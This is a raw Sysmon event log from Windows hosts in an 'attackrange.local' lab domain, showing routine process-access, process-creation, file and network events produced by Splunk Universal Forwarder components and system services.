07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.742{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.612{466BC892-F601-60EB-8F7D-00000000CF01}7868C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.611{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E0CC546BEFC9C88914F1C7F67959F2B,SHA256=45B7BBC125D6AD03C9F60AF8F805F347126DC1830F3FBC468B827620341C2B25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12553498FD26C31A2D66F6D186A924ED,SHA256=2A8B4AC93E78581B77AF5344FED538A8CC1A75DA7DB7D02346A6A699B9B7D1AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:53.273{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A670FBAF25430C75120F43DB02AD0AC,SHA256=A3BF8484BDE4C743EE74A6F6A0040A328D00BCA307335DA6D96627E1F2CDABC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:53.273{466BC892-F600-60EB-8E7D-00000000CF01}89601184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.662{466BC892-F602-60EB-907D-00000000CF01}97568896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x80000000000000001051509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.628{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F5976CD0A6E18ECEE83C43A8BB4B47E,SHA256=E07FF9B5E30AF0B2002273721914D5032B52898103BE1F98A68E597B6EC54B4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.627{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A4D052341CBDC1B95759333B9B2ECD9,SHA256=28E33BF70DA561E4C5797D023D67F3ABED4EC8A0D608792F3E8C972F62F6688F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:54.275{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B66C8DA1C2262DD246EF9CF1C454232,SHA256=882795EEE12EB010D5EFD4EBFD833C08149040265DFF0DE26551D97B6A8D5CA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.414{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:54.408{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.408{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:54.238{466BC892-F602-60EB-907D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.846{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.646{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECDC065B49E249360D7B28E7CA25084,SHA256=3CFF227C658A0D3CC0619073CE4319FEAF1A27D2953D1906B3D0A794B1F8C583,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:54.251{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57337-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:55.278{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43487F42FEFF22A024AB10626DD74446,SHA256=4559187CC3CA8CC4153DEF2FD8281A3DBF5A2EAE6D16A6903F5643212EDD5725,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.291{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F603-60EB-917D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.288{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:55.287{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F603-60EB-917D-00000000CF01}368C:\Program 
